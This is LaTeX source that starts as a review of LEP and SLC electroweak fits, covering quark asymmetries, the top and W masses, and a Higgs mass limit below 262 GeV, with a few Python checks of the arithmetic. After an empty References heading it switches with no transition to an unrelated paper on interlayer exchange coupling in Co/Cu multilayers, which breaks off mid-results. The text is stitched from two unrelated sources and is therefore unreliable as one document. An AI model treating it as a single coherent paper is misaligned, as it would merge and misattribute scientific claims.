A^c_{\mathrm{FB}}= 0.0709 \pm 0.0044 & \Longrightarrow & {\sin^2\theta_{\mathrm{eff}} = 0.2322 \pm 0.0010}
\nonumber \\
A_b = 0.867 \pm 0.035 & & \nonumber \\
A_c = 0.647 \pm 0.040 & & \nonumber
\end{eqnarray}
\noindent where the largest correlation, 13\%, is that between $A^b_{\mathrm{FB}}$ and $A^c_{\mathrm{FB}}$.
Taking the value of $A_{\mathrm{l}}$ given in section~\ref{subsec:lepton_coup} and these
measurements together in a combined fit gives
\noindent
\begin{eqnarray}
& A_b = 0.881 \pm 0.018 & \nonumber \\
& A_c = 0.641 \pm 0.028 & \nonumber
\end{eqnarray}
\noindent to be compared with the MSM predictions $A_b = 0.935$ and
$A_c = 0.668$ valid over a wide
range of the input parameters.
The measurement of $A_c$ is in good agreement with expectations,
while the measurement of $A_b$ is 3 standard deviations lower than
the predicted value.
This is due to three independent measurements: the SLD measurement of
$A_b$ is low compared with the MSM, while the LEP measurement of
$A^b_{\mathrm{FB}}$ is low and the SLD measurement of
$A_{\mathrm{LR}}$ is high compared with the results of the best fit to
the MSM predictions (see section~\ref{subsec:fit}).
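The quoted MSM values of $A_b$ and $A_c$ follow from the tree-level quark couplings; a minimal sketch (assuming $g_V = T^3 - 2Q\sin^2\theta_{\mathrm{eff}}$, $g_A = T^3$ and $\sin^2\theta_{\mathrm{eff}} \simeq 0.2315$, with electroweak corrections neglected):

```python
# Tree-level MSM values of A_b and A_c, using g_V = T3 - 2*Q*sin^2(theta_eff)
# and g_A = T3 (effective couplings; electroweak corrections neglected).
def A_f(sin2, Q, T3):
    r = (T3 - 2.0 * Q * sin2) / T3      # g_V / g_A
    return 2.0 * r / (1.0 + r * r)

s2 = 0.2315
A_b = A_f(s2, -1.0 / 3.0, -0.5)
A_c = A_f(s2, 2.0 / 3.0, 0.5)
print(f"A_b = {A_b:.3f}, A_c = {A_c:.3f}")   # ~0.935, ~0.668
```

Note how weakly $A_b$ depends on $\sin^2\theta_{\mathrm{eff}}$: the $3\sigma$ deficit discussed above cannot be absorbed by a shift of the mixing angle alone.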
\subsubsection{\bf Jet charge asymmetries}\label{subsec:jet_asym}
The average charge flow in the inclusive samples of hadronic $\mathrm{Z}^{0}$~decays
is related to the forward-backward asymmetries of individual quarks:
\noindent
\begin{eqnarray}
\langle \mathrm{Q}_{\mathrm{FB}} \rangle & = & \sum_{\mathrm{q}}
\delta_{\mathrm{q}} A^{\mathrm{q}}_{\mathrm{FB}} \frac{\Gamma_{\mathrm{q\bar{q}}}}{\Gamma_{\mathrm{h}}}
\end{eqnarray}
\noindent where $\delta_{\mathrm{q}}$, the charge separation, is the average charge
difference between the quark and antiquark hemispheres in an event.
The combined LEP value is
\noindent
\begin{eqnarray}
& {\sin^2\theta_{\mathrm{eff}} = 0.2321 \pm 0.0010}. & \nonumber
\end{eqnarray}
\subsubsection{\bf Comparison of the determinations of
$\boldmath{\sin^2\theta_{\mathrm{eff}}}$}\label{subsec:sineff}
The combination of all the quark asymmetries shown in this section can be
directly compared to the determination of $\sin^2\theta_{\mathrm{eff}}$~obtained with leptons,
\noindent
\begin{eqnarray}
{\sin^2\theta_{\mathrm{eff}} = 0.23222 \pm 0.00033} & & \mathrm{(quark-asymmetries)} \nonumber \\
{\sin^2\theta_{\mathrm{eff}} = 0.23128 \pm 0.00022} & & \mathrm{(lepton-asymmetries)} \nonumber
\end{eqnarray}
\noindent which shows a 2.4~$\sigma$ discrepancy.
Overall, the agreement is very good, and the combination of the individual
determinations of $\sin^2\theta_{\mathrm{eff}}$~gives
\noindent
\begin{eqnarray}
& {\sin^2\theta_{\mathrm{eff}} = 0.23157 \pm 0.00018} & \nonumber
\end{eqnarray}
\noindent with a $\chi^2/\mathrm{dof}=7.8/6$ as it is shown
in figure~\ref{fig:sef}.
\begin{figure}
\centering
\mbox{%
\epsfig{file=sweff.eps
,height=7cm
,width=8cm
}%
}
\caption{Comparison of several determinations of $\sin^2\theta_{\mathrm{eff}}$~from asymmetries.}
\label{fig:sef}
\end{figure}
\section{Consistency with the Minimal Standard Model}\label{sec:consistency}
The MSM predictions are computed using the programs TOPAZ0~\cite{TOPAZ0}
and ZFITTER~\cite{ZFITTER}. They represent the state-of-the-art in the
computation of radiative corrections, and incorporate recent calculations such as
the QED radiator function to ${\cal O}(\alpha^3)$~\cite{ALPHA3}, four-loop
QCD effects~\cite{QCD4LOOP}, non-factorisable QCD-EW corrections~\cite{QCDEW},
and two-loop sub-leading
${\cal O}(\alpha^2 \mathrm{m}^2_{\mathrm{t}} / \mathrm{M}^2_{\mathrm{Z}})$
corrections~\cite{DEGRASSI}, resulting in a significantly reduced theoretical
uncertainty compared to the work summarized in reference~\cite{YR95}.
\subsection{\bf Are we sensitive to radiative corrections other than $\Delta\alpha$?}\label{subsec:sensitivity}
This is the most natural question to ask if one intends to test the MSM as
a Quantum Field Theory and
to extract information on the only unknown parameter in the MSM, $\mathrm{M}_{\mathrm{H}}$.
The MSM prediction of $\mathrm{R}_{\mathrm{b}}$~neglecting radiative corrections is ${\mathrm{R}}^0_{\mathrm{b}}=0.2183$,
while the measured value given in section~\ref{subsec:HF} is about $2.3\sigma$ lower.
From table~\ref{tab:sensitiv} one can see that the MSM prediction depends only
on $\mathrm{m}_{\mathrm{t}}$~and makes it possible to determine its mass indirectly to be $\mathrm{m}_{\mathrm{t}}$=151$\pm$25~GeV,
in agreement with the direct measurement ($\mathrm{m}_{\mathrm{t}}$=173.8$\pm$5.0~GeV).
From the measurement of the leptonic width, the axial-vector coupling given in
section~\ref{subsec:lepton_coup} disagrees with the Born prediction ($-1/2$) by about
$3.4\sigma$, showing evidence for radiative corrections in the
$\rho$ parameter, $\Delta\rho = 0.0041 \pm 0.0012$.
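Both statements can be verified numerically (a sketch; the relation $g^l_A = -\frac{1}{2}\sqrt{1+\Delta\rho}$ is the standard on-shell parametrisation, assumed here):

```python
# Pull of R_b with respect to the correction-free prediction, and Delta_rho
# extracted from the axial coupling via g_A = -(1/2)*sqrt(1 + Delta_rho)
# (the standard on-shell relation, assumed here).
Rb_meas, Rb_err, Rb0 = 0.21656, 0.00074, 0.2183
pull = (Rb_meas - Rb0) / Rb_err
print(f"R_b pull = {pull:.2f} sigma")       # ~ -2.35 (the quoted ~2.3 sigma)

gA = -0.50102
delta_rho = 4.0 * gA * gA - 1.0
print(f"Delta_rho = {delta_rho:.4f}")       # ~0.0041
```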
However, the most striking evidence for pure weak radiative corrections is not coming
from $\mathrm{Z}^{0}$~physics, but from $\mathrm{M}_{\mathrm{W}}$~and its relation with $G_{\mu}$. The value measured
at LEP and TEVATRON~\cite{LANCON} is $\mathrm{M}_{\mathrm{W}}$=$80.39 \pm 0.06$~GeV. From this measurement
and through the relation
\noindent
\begin{eqnarray}
\mathrm{M}^2_{\mathrm{W}} \left(1 - \frac{\mathrm{M}^2_{\mathrm{W}}}{\mathrm{M}^2_{\mathrm{Z}}} \right) &
= & \frac{\pi \alpha}{G_{\mu} \sqrt{2}} \left( 1 + \Delta r\right)
\end{eqnarray}
\noindent one gets a measurement of $\Delta r = 0.036 \pm 0.004$, and subtracting the
value of $\Delta\alpha$ ($\Delta\alpha = -\Pi_{\gamma\gamma}$),
given in section~\ref{subsec:input_par},
one obtains $\Delta r_{\mathrm{W}} = \Delta r - \Delta \alpha = -0.027 \pm 0.004$,
which is about $6.8\sigma$ different from zero. A more detailed investigation
on the evidence for pure weak radiative corrections can be found in reference~\cite{SIRLIN}.
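The extraction of $\Delta r$ from the relation above is easily reproduced (a numerical sketch with the quoted inputs):

```python
import math

# Delta_r from M_W, M_Z, alpha(0) and G_mu, and the pure weak part
# Delta_r_W after subtracting Delta_alpha = -Pi_gamma,gamma = 0.0632.
alpha0 = 1.0 / 137.0359895
Gmu = 1.16639e-5             # GeV^-2
MW, MZ = 80.39, 91.1867      # GeV

lhs = MW**2 * (1.0 - MW**2 / MZ**2)
rhs0 = math.pi * alpha0 / (math.sqrt(2.0) * Gmu)
delta_r = lhs / rhs0 - 1.0
delta_r_W = delta_r - 0.0632
print(f"Delta_r = {delta_r:.3f}, Delta_r_W = {delta_r_W:.3f}")  # ~0.036, ~ -0.027
```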
\subsection{\bf Fit to the MSM predictions}\label{subsec:fit}
Having shown that there is sensitivity to pure weak corrections with the accuracy in the
measurements achieved so far, one can envisage fitting the values of the unknown Higgs mass and
the less precisely known top mass in the context of the MSM predictions. The fit
is done using not only the $\mathrm{Z}^{0}$~measurements shown in this letter but also
the W mass measurements~\cite{LANCON} and $\nu$N scattering measurements~\cite{NUTEV}.
The quality of the fit is very good, ($\chi^2/\mathrm{dof}=13.3/14$) and
the result is,
\noindent
\begin{eqnarray}
\mathrm{m}_{\mathrm{t}} & = & 161.1^{+8.2}_{-7.1}~\mathrm{GeV} \nonumber
\end{eqnarray}
\noindent to be compared with $\mathrm{m}_{\mathrm{t}}$=173.8$\pm$5.0~GeV measured at TEVATRON. The result
of the fit is shown in the $\mathrm{M}_{\mathrm{H}}$-$\mathrm{m}_{\mathrm{t}}$~plane in figure~\ref{fig:mhmt}. Both
determinations of $\mathrm{m}_{\mathrm{t}}$~have similar precision and are compatible ($1.4\sigma$). Therefore,
one can constrain the previous fit with the direct measurement of $\mathrm{m}_{\mathrm{t}}$~and obtain:
\noindent
\begin{eqnarray}
\mathrm{m}_{\mathrm{t}} = & 171.1 \pm 4.9~\mathrm{GeV} & \nonumber \\
\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV}) = & 1.88^{+0.33}_{-0.41} &
(\mathrm{M}_{\mathrm{H}} = 76^{+85}_{-47}~\mathrm{GeV}) \nonumber \\
\alpha_s = & 0.119 \pm 0.003 & \nonumber
\end{eqnarray}
\noindent with a very reasonable $\chi^2/\mathrm{dof}=14.9/15$. The agreement
of the fit with the measurements is impressive and is shown as a pull distribution in
figure~\ref{fig:pulls}.
The best indirect determination of the W mass is obtained from
the MSM fit when no information from the direct measurement is used,
\noindent
\begin{eqnarray}
\mathrm{M}_{\mathrm{W}} & = & 80.367 \pm 0.029~\mathrm{GeV}. \nonumber
\end{eqnarray}
The most significant correlation among the fitted parameters is 77\% between
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ and $\alpha(\mathrm{M}^2_{\mathrm{Z}})$.
If one of the more precise new evaluations of $\Delta\alpha$ mentioned in
section~\ref{subsec:input_par} is used, this correlation decreases dramatically
and the precision on $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ improves by about 30\%.
For instance, using $\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}}) = 128.923 \pm 0.036$
from reference~\cite{DAVIER}, one gets:
\noindent
\begin{eqnarray}
\mathrm{m}_{\mathrm{t}} = & 171.4 \pm 4.8~\mathrm{GeV} & \nonumber \\
\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV}) = & 1.96^{+0.23}_{-0.26} &
(\mathrm{M}_{\mathrm{H}} = 91^{+64}_{-41}~\mathrm{GeV}) \nonumber \\
\alpha_s = & 0.119 \pm 0.003 & \nonumber
\end{eqnarray}
\noindent with the same confidence level ($\chi^2/\mathrm{dof}=14.9/15$) and
a correlation of 39\% between
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ and $\alpha(\mathrm{M}^2_{\mathrm{Z}})$.
\begin{figure}
\centering
\mbox{%
\epsfig{file=mhmt.eps
,height=7cm
,width=9cm
}%
}
\caption{The 68\% and 95\% confidence level contours in the $\mathrm{m}_{\mathrm{t}}$~vs~$\mathrm{M}_{\mathrm{H}}$~plane. The
vertical band shows the 95\% C.L. exclusion limit on $\mathrm{M}_{\mathrm{H}}$~from direct searches.}
\label{fig:mhmt}
\end{figure}
\begin{figure}
\centering
\mbox{%
\epsfig{file=pulls.eps
,height=7cm
,width=9cm
}%
}
\caption{Pulls of the measurements with respect to the best fit results. The
pull is defined as the difference of the measurement to the fit prediction divided
by the measurement error.}
\label{fig:pulls}
\end{figure}
\section{Constraints on $\mathrm{M}_{\mathrm{H}}$}
In the previous section it has been shown that the global MSM fit to the data
gives
\noindent
\begin{eqnarray}
\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV}) = & 1.88^{+0.33}_{-0.41} &
(\mathrm{M}_{\mathrm{H}} = 76^{+85}_{-47}~\mathrm{GeV}) \nonumber
\end{eqnarray}
\noindent and taking into account the theoretical uncertainties (about $\pm$0.05 in
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$), this implies a one-sided 95\%~C.L. limit of:
\noindent
\begin{eqnarray}
\mathrm{M}_{\mathrm{H}} & < & 262~\mathrm{GeV}~@ 95 \%~\mathrm{C.L.} \nonumber
\end{eqnarray}
\noindent which does not take into account the limits from direct searches
($\mathrm{M}_{\mathrm{H}} > 89.8~\mathrm{GeV}~@ 95 \%~\mathrm{C.L.}$).
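Converting the fitted $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ and its errors back to the Higgs mass is straightforward (a sketch; the one-sided limit below uses a simple Gaussian 1.645$\sigma$ step on the upper error, so it lands close to, but not exactly at, the quoted 262~GeV, which includes the theoretical uncertainty and the exact statistical treatment):

```python
# Higgs mass and asymmetric errors from the fitted log10(M_H/GeV), plus a
# rough one-sided 95% C.L. limit (Gaussian 1.645 sigma on the upper error).
logmh, err_up, err_dn = 1.88, 0.33, 0.41

mh = 10.0 ** logmh
mh_up = 10.0 ** (logmh + err_up) - mh
mh_dn = mh - 10.0 ** (logmh - err_dn)
limit95 = 10.0 ** (logmh + 1.645 * err_up)
print(f"M_H = {mh:.0f} +{mh_up:.0f} -{mh_dn:.0f} GeV")   # ~76 +86 -46
print(f"M_H < {limit95:.0f} GeV at 95% C.L.")            # ~265 (262 quoted)
```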
\subsection{\bf Is this low value of $\mathrm{M}_{\mathrm{H}}$~a consequence of a particular measurement?}\label{subsec:consistency}
As described in section~\ref{subsec:what_meas}, one can divide the measurements sensitive
to the Higgs mass into three different groups: Asymmetries, Widths and the W mass. They test
conceptually different components of the radiative corrections and it is interesting to
check the internal consistency.
Repeating the MSM fit shown in the previous section for the three different groups of measurements
with the additional constraint from~\cite{ALPHAS} $\alpha_s = 0.119 \pm 0.002$ gives the results shown in
the second column in
table~\ref{tab:consistency}. All the fits are consistent with a low value of the Higgs mass,
and there is no particular set of measurements that pulls $\mathrm{M}_{\mathrm{H}}$~down. This is seen in even more
detail in figure~\ref{fig:logmh}, where the individual determinations of
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ are shown for each measurement.
\begin{table}[t]
\caption{ Results on $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ for different samples of
measurements. In the fit the input parameters and their uncertainties are taken to
be the values presented in section~\ref{subsec:input_par}. The impact of the uncertainty in each
parameter is explicitly shown. \label{tab:consistency}}
\vspace{0.2cm}
\begin{center}
\footnotesize
\begin{tabular}{|l|c|c c c c c c c c c|}
\hline
{} &\raisebox{0pt}[13pt][7pt]{$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$} &
\raisebox{0pt}[13pt][7pt]{$[\Delta\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})]^2$} & = &
\raisebox{0pt}[13pt][7pt]{$[\Delta_{\mathrm{exp.}}]^2 $} & + &
\raisebox{0pt}[13pt][7pt]{$[\Delta\mathrm{m}_{\mathrm{t}}]^2 $} & + &
\raisebox{0pt}[13pt][7pt]{$[\Delta\alpha]^2 $} & + &
\raisebox{0pt}[13pt][7pt]{$[\Delta\alpha_s]^2$} \\
\hline
$\mathrm{Z}^{0}$~Asymmetries & $1.94^{+0.29}_{-0.31}$ &
$[0.29]^2$ & = & $[0.19]^2$ & + & $[0.12]^2$ & + & $[0.19]^2$ & + & $[0.01]^2$ \\
$\mathrm{Z}^{0}$~Widths & $2.21^{+0.36}_{-1.43}$ &
$[0.36]^2$ & = & $[0.31]^2$ & + & $[0.14]^2$ & + & $[0.08]^2$ & + & $[0.13]^2$ \\
$\mathrm{M}_{\mathrm{W}}$~and~$\nu\mathrm{N}$ & $2.04^{+0.45}_{-0.84}$ &
$[0.45]^2$ & = & $[0.41]^2$ & + & $[0.18]^2$ & + & $[0.08]^2$ & + & $[0.00]^2$ \\
\hline
\end{tabular}
\end{center}
\end{table}
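The error decomposition in table~\ref{tab:consistency} is a combination in quadrature, as the column header states. A short sketch (illustrative only) recomputes each total from the quoted components; small discrepancies, e.g.\ 0.37 instead of 0.36 for the widths row, reflect the rounding of the quoted components.

```python
import math

# (quoted total, [exp., m_t, alpha, alpha_s]) for each row of the table
rows = {
    "Z0 asymmetries": (0.29, [0.19, 0.12, 0.19, 0.01]),
    "Z0 widths":      (0.36, [0.31, 0.14, 0.08, 0.13]),
    "M_W and nuN":    (0.45, [0.41, 0.18, 0.08, 0.00]),
}

for name, (total, parts) in rows.items():
    combined = math.sqrt(sum(p * p for p in parts))
    print(f"{name}: quoted {total:.2f}, recomputed {combined:.2f}")
```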
\begin{figure}
\centering
\mbox{%
\epsfig{file=logmh.eps
,height=7cm
,width=9cm
}%
}
\caption{Individual determination of $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ for each
of the measurements.}
\label{fig:logmh}
\end{figure}
\begin{figure}
\centering
\mbox{%
\epsfig{file=chi2mh.eps
,height=7cm
,width=8cm
}%
}
\caption{ $\Delta\chi^2 = \chi^2 - \chi^2_{\mathrm{min}}$ vs. $\mathrm{M}_{\mathrm{H}}$~curve. Different
cases are considered: the present situation, the future situation when
$\mathrm{M}_{\mathrm{W}}$~is measured with a precision of 30~MeV, and
when $\Delta\alpha^{-1}=0.02$ and $\Delta\mathrm{m}_{\mathrm{t}}=2$~GeV.
The band shows the limit from direct searches, and the discontinuous line the
expected limit at the end of LEP2.}
\label{fig:chi2mh}
\end{figure}
\subsection{\bf Is there any chance to improve these constraints?}\label{subsec:future}
Although the most precise determination
of the Higgs mass is still coming from the $\mathrm{Z}^{0}$~asymmetries, it is clear
from table~\ref{tab:consistency} that any
future improvement will be limited by the uncertainty in
$\alpha(\mathrm{M}^2_{\mathrm{Z}})$. If
$\Delta\alpha^{-1} \sim 0.02$, then the error on
$\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ is reduced to about 0.23
($[\Delta_{\mathrm{exp.}}] \oplus [\Delta\mathrm{m}_{\mathrm{t}}]$), coming
only from the $\mathrm{Z}^{0}$~asymmetries measurements.
The accuracy of the W-boson mass is going to improve by a significant
factor in the near future. However, even if the W mass is measured with a
precision of 30~MeV, the error on $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$
is going to be dominated by $\Delta\mathrm{m}_{\mathrm{t}}$ and will
not be better than the 0.23 obtained with the $\mathrm{Z}^{0}$~asymmetries only,
both determinations being highly correlated through the uncertainty on
the top mass.
Therefore, the error on $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$~is not going to
improve significantly until a precise measurement of the top mass (2~GeV)
becomes available. In such a case, one can easily obtain a precision
in $\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})$ close to 0.15. This is what is shown
in figure~\ref{fig:chi2mh}.
Also shown in figure~\ref{fig:chi2mh} is the
expected direct search limit from LEP2. If the tendency to prefer a very
low value of $\mathrm{M}_{\mathrm{H}}$~persists with the new or updated measurements, and the accuracies
of the top mass and W-boson mass improve significantly while remaining consistent with the indirect
determinations, we may be able to severely constrain the value of $\mathrm{M}_{\mathrm{H}}$.
\section{Conclusions and outlook}
The measurements performed at LEP and SLC have substantially improved
the precision of the tests of the MSM, at the level of ${\cal O}(0.1\%)$.
The effects of pure weak corrections are visible with a significance
larger than three standard deviations from $\mathrm{Z}^{0}$~observables and about
seven standard deviations from the W-boson mass.
The top mass predicted by the MSM fits, ($\mathrm{m}_{\mathrm{t}}$=$161.1^{+8.2}_{-7.1}$~GeV) is
compatible (about $1.4\sigma$) with the direct measurement
($\mathrm{m}_{\mathrm{t}}$=$173.8 \pm 5.0$~GeV) and of similar precision.
The W-boson mass predicted by the MSM fits, ($\mathrm{M}_{\mathrm{W}}=80.367\pm0.029~\mathrm{GeV}$)
is in very good agreement with the direct measurement
($\mathrm{M}_{\mathrm{W}}=80.39\pm0.06~\mathrm{GeV}$).
The mass of the Higgs boson is predicted to be low,
\noindent
\begin{eqnarray}
\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV}) = & 1.88^{+0.33}_{-0.41} &
(\mathrm{M}_{\mathrm{H}} = 76^{+85}_{-47}~\mathrm{GeV}) \nonumber \\
\mathrm{M}_{\mathrm{H}} & < & 262~\mathrm{GeV}~@ 95 \%~\mathrm{C.L.} \nonumber
\end{eqnarray}
\noindent This uncertainty is reduced to $\Delta(\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})) \sim 0.23$ when
the uncertainty from
$\Delta\alpha$ is negligible, and will be further reduced to
$\Delta(\log(\mathrm{M}_{\mathrm{H}}/\mathrm{GeV})) \sim 0.15$ when $\mathrm{m}_{\mathrm{t}}$~is known with a 2~GeV precision
and $\mathrm{M}_{\mathrm{W}}$~is known with a 30~MeV precision.
\section*{Acknowledgments}
I would like to thank Prof. Joan Sol\`{a} and all the organizing committee for the
excellent organization of the workshop.
I am very grateful to Martin W. Gr\"{u}newald and Gunter Quast for their help
in the preparation of the numbers and plots shown in this paper. I also thank
Guenther Dissertori for reading the paper and giving constructive criticism.
\section*{References}
The oscillatory interlayer exchange coupling (IEC) between magnetic
layers separated by a non-magnetic spacer has recently attracted
considerable attention in the literature.
The physical origin of such oscillations is attributed to quantum
interferences due to spin-dependent confinement of electrons in the
spacer.
The periods of the oscillations with respect to the
spacer thickness are determined by the spacer Fermi surface, and this
conclusion has been confirmed by numerous experiments.
In particular, a change of the Fermi surface by alloying
thus leads to a change of the oscillatory periods ({\it van Schilfgaarde
et al.}, 1995; {\it Kudrnovsk\'y et al.}, 1996).
On the other hand, there are very few studies of the temperature-dependence
of the IEC ({\it Bruno}, 1995; {\it d'Albuquerque~e~Castro et al.}, 1996),
and its systematic study on {\it ab initio} level is missing.
The main mechanism of the temperature dependence of the IEC is connected
with thermal excitations of electron-hole pairs across the Fermi level
as described by the Fermi-Dirac function.
It turns out that other mechanisms (e.g. electron-phonon or electron-magnon
interactions) are less important.
The effect of the temperature on the IEC can be evaluated either
analytically or numerically.
The analytical approach assumes the limit of large spacer thicknesses,
for which all the oscillatory contributions to the energy
integral cancel out with the exception of those at the Fermi energy.
The energy integral is then evaluated by a standard saddle-point method
({\it Bruno}, 1995).
The general functional form of the temperature-dependence of the interlayer
exchange coupling ${\cal E}_x(T)$ in the limit of a single period is then:
\begin{equation} \label{eq_model}
{\cal E}_x(T) = {\cal E}_x(0) \, t(N,T) \, , \;\;\;\;
t(N,T)=\frac{cNT}{\sinh(cNT)} \, .
\end{equation}
Here, $T$ denotes the temperature, $N$ is the spacer thickness in monolayers,
and $c$ is the constant which depends on the spacer Fermi surface.
The term ${\cal E}_x(0)$ exhibits a standard $N^{-2}$-dependence
({\it Bruno}, 1995),
while the scaling temperature factor $t(N,T)$ depends on $N$ via $NT$.
In the preasymptotic regime (small spacer thicknesses) the functional form
of $t(N,T)$ differs from that of Eq.~(\ref{eq_model}), particularly in the
case of the complete but relatively weak confinement due to the rapid
variation of the phase of the integrand which enters the evaluation of the
IEC ({\it d'Albuquerque e Castro et al.}, 1996).
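The scaling factor of Eq.~(\ref{eq_model}) is straightforward to evaluate. The sketch below (illustrative only; the value of $c$ is an arbitrary choice here, since the physical value is fixed by the spacer Fermi surface) shows that $t(N,T) \rightarrow 1$ as $T \rightarrow 0$, that it decays exponentially for large $cNT$, and that it depends on $N$ and $T$ only through the product $NT$.

```python
import math

def t_factor(N, T, c):
    """Temperature suppression factor t(N,T) = cNT / sinh(cNT) of Eq. (1)."""
    x = c * N * T
    return x / math.sinh(x) if x != 0.0 else 1.0

# t -> 1 as T -> 0 and decays like 2cNT exp(-cNT) for large cNT, so
# thicker spacers are suppressed already at lower temperatures.
c = 1.0e-3  # illustrative value only; not taken from the paper
for T in (0.0, 100.0, 300.0, 500.0):
    print(f"T = {T:5.1f} K: t(N=20, T) = {t_factor(20, T, c):.4f}")
```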
The second, numerical approach is in principle exact and not limited to large
spacer thicknesses; however, it may be numerically very demanding, in
particular at low temperatures.
It is applicable also to disordered systems with randomness in
the spacer, magnetic layers, or at interfaces ({\it Bruno et al.}, 1996).
\section{FORMALISM}
The multilayer system consists of the left and right magnetic subspaces
separated by a non-magnetic spacer (the trilayer).
The spacer may be a random substitutional alloy.
We employ the Lloyd formulation of the IEC combined with a
spin-polarized surface Green function technique as based
on the tight-binding linear muffin-tin orbital (TB-LMTO) method.
The exchange coupling energy ${\cal E}_x(T)$ can be written as
\begin{eqnarray} \label{eq_IEC}
{\cal E}_x(T) &=& {\rm Im} \, I(T) \, , \quad
I(T) = \int_{C} f(T,z) \, \Psi(z) \, d z \, ,
\end{eqnarray}
where $f(T,z)$ is the Fermi-Dirac distribution function and
\begin{eqnarray} \label{eq_psi}
\Psi(z) &=& \frac{1}{\pi N_{\|}} \, \sum_{{\bf k}_{\|}} \,
{\rm tr}_{L} \, {\rm ln} \, {\sf M}({\bf k}_{\|},z)
\end{eqnarray}
is the difference of (in the case of disorder, configurationally
averaged) grandcanonical potentials for the antiferromagnetic and
ferromagnetic alignments of the magnetic slabs ({\it Drchal et al.}, 1996).
The energy integration is performed over a contour $C$ along the real
axis and closed by a large semicircle in the upper half of the complex
energy plane, tr$_{L}$ denotes the trace over angular momentum indices
$L=(\ell m)$, the sum runs over ${\bf k}_{\|}$-vectors in the surface
Brillouin zone, and $N_{\|}$ is the number of lattice sites in one layer.
The quantity ${\sf M}({\bf k}_{\|},z)$ is expressed in terms of the
screened structure constants which couple neighboring (principal) layers
and of the so-called surface Green functions.
All details can be found in ({\it Drchal et al.}, 1996).
We only note that the use of a Green function formulation of the IEC
is essential for describing the randomness in the spacer within the
coherent potential approximation (CPA) which is known to reproduce
compositional trends in random alloys reliably.
The integral in (\ref{eq_IEC}) can be recast into a more suitable form
using the analytic properties of $\Psi(z)$, namely, (i) $\Psi(z)$
is holomorphic in the upper complex halfplane, and (ii)
$z \Psi(z) \rightarrow 0$ for $z \rightarrow \infty, \, {\rm Im} z > 0$.
Let us define a new function $\Phi(y) = -i \, \Psi(E_F+iy)$ of a real
variable $y$, $y \geq 0$.
Then at $T=0$ K,
\begin{eqnarray} \label{eq_I0}
I(0) = \int_{0}^{+\infty} \Phi(y) \, dy \, ,
\end{eqnarray}
while at $T>0$ K,
\begin{eqnarray} \label{eq_IT}
I(T) = 2 \pi k_B T \sum_{k=1}^{\infty} \Phi(y_k) \, ,
\end{eqnarray}
where $k_B$ is the Boltzmann constant and $y_k$ are Matsubara energies
$y_k = \pi k_B T (2k - 1)$.
In the limit $T \rightarrow 0$, $I(T) \rightarrow I(0)$ continuously.
We have verified that the function $\Phi(y)$ can be represented with
a high accuracy as a sum of a few complex exponentials in the form
\begin{equation}
\Phi(y)=\sum_{j=1}^M \, A_j \, {\rm exp} (p_j y) \, ,
\label{dcexp}
\end{equation}
where $A_j$ are complex amplitudes and $p_j$ are complex wave numbers.
An efficient method of finding the parameters $A_j$ and $p_j$ is described
elsewhere ({\it Drchal et al.}, 1998).
The evaluation of $I(T)$ is then straightforward:
\begin{equation}
I(T) = - 2 \pi k_B T \, \sum_{j=1}^M \,
\frac{A_j}{{\rm exp} \, (\pi k_B T p_j) - {\rm exp} \, (-\pi k_B T p_j)} \, ,
\label{cexpT}
\end{equation}
which for $T=0$ K gives
\begin{equation}
I(0) = - \sum_{j=1}^M \, \frac{A_j}{p_j} \, .
\label{cexp0}
\end{equation}
\section{RESULTS AND DISCUSSION}
Numerical studies were performed for an ideal fcc(001) layer
stack of the spacer (Cu) and magnetic (Co) layers with the experimental
lattice spacing of fcc Cu.
The spacer layers can contain impurities (Zn, Ni, or Au) which form
a substitutional alloy with the spacer atoms.
Possible lattice and layer relaxations are neglected.
Alloying with Ni, Zn, or Au alters the electron concentration and,
consequently, modifies the Fermi surface and thus, in turn, also the
temperature dependence of the IEC.
The most obvious effect of the alloying, for $T=0$, is the change of
the periods of oscillations connected with the change of the corresponding
spanning vectors of the alloy Fermi surface ({\it Kudrnovsk\'y et al.},
1996).
The more subtle effect of the alloying is connected with damping of
electron states and the relaxation of symmetry rules.
To determine the parameters of complex exponentials (\ref{dcexp}), we have
evaluated the function $\Phi(y)$ at 40 Matsubara energies corresponding
to $T=25$ K.
We have verified that the results depend weakly on the actual value of the
parameter $T$.
Special care was devoted to the Brillouin zone integration.
The efficiency of the present approach allows us to perform calculations
with a large number of ${\bf k}_{\|}$-points in the irreducible part of
the surface Brillouin zone (ISBZ).
Note also that such calculations have to be done only once and then the
evaluation of the IEC for any temperature is an easy task.
In particular, we employ typically 40000 ${\bf k}_{\|}$-points in the ISBZ
for the first Matsubara energies close to the Fermi energy and
the number of ${\bf k}_{\|}$-points then progressively decreases for points
distant from the real axis.
The present calculations agree with the results of conventional calculations
({\it Drchal et al.}, 1996) but they are much more efficient numerically,
in particular when calculations for many different temperatures are required.
\begin{figure} [htb]
\centering
\epsfsize=30cm
\epsffile{figpm.ps}
\caption{ Absolute values of the discrete Fourier transformations of
$N^2{\cal E}_x(N,T)$ with respect to the spacer thickness $N$ as
a function of the temperature $T$ and the wave vector $q$ for a
trilayer consisting of semiinfinite Co-slabs sandwiching the spacer
with indicated compositions.}
\label{fig.1}
\end{figure}
The calculations were done for spacer thicknesses $N=1-50$ monolayers and
for temperatures $T=0-500$~K (in steps 10~K) and by assuming semiinfinite
Co-slabs.
In this case only one period, namely the so-called short-period exists,
which simplifies the study.
There are several possibilities of how to present the results
(see ({\it Drchal et al.}, 1998) for more details).
